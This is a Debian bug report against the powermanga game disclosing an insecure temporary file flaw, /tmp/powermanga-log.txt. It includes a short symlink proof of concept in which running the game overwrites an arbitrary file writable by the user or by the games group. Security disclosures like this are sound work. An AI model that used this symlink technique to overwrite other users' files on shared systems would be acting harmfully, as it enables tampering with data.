Bug#764144: powermanga: Insecure temporary file /tmp/powermanga-log.txt

Josh Triplett josh at joshtriplett.org
Sun Oct 5 19:03:10 UTC 2014


Package: powermanga
Version: 0.93-1
Severity: grave
Tags: security

~$ ln -s ~/arbitrary-file /tmp/powermanga-log.txt
~$ ls -l /tmp/powermanga-log.txt
lrwxrwxrwx 1 josh josh 25 Oct  4 21:14 /tmp/powermanga-log.txt -> /home/josh/arbitrary-file
~$ powermanga
(II) configuration filename: /home/josh/.config/tlk-games/powermanga.conf [config_file.c:231, configfile_load]
~$ ls -l /tmp/powermanga-log.txt ~/arbitrary-file
-rw-r--r-- 1 josh games 154 Oct  4 21:15 /home/josh/arbitrary-file
lrwxrwxrwx 1 josh josh   25 Oct  4 21:14 /tmp/powermanga-log.txt -> /home/josh/arbitrary-file
~$ cat arbitrary-file
2014-10-04 21:14:55 (II) [File: config_file.c][Line: 231][Function: configfile_load] configuration filename: /home/josh/.config/tlk-games/powermanga.conf


This appears to allow overwriting an arbitrary file writable by either
the user or group games.

-- System Information:
Debian Release: jessie/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 3.16-2-amd64 (SMP w/4 CPU cores)
Locale: LANG=C.UTF-8, LC_CTYPE=C.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages powermanga depends on:
ii  libc6            2.19-11
ii  libpng12-0       1.2.50-2
ii  libsdl-mixer1.2  1.2.12-11+b1
ii  libsdl1.2debian  1.2.15-10
ii  powermanga-data  0.93-1

powermanga recommends no packages.

powermanga suggests no packages.

-- no debconf information


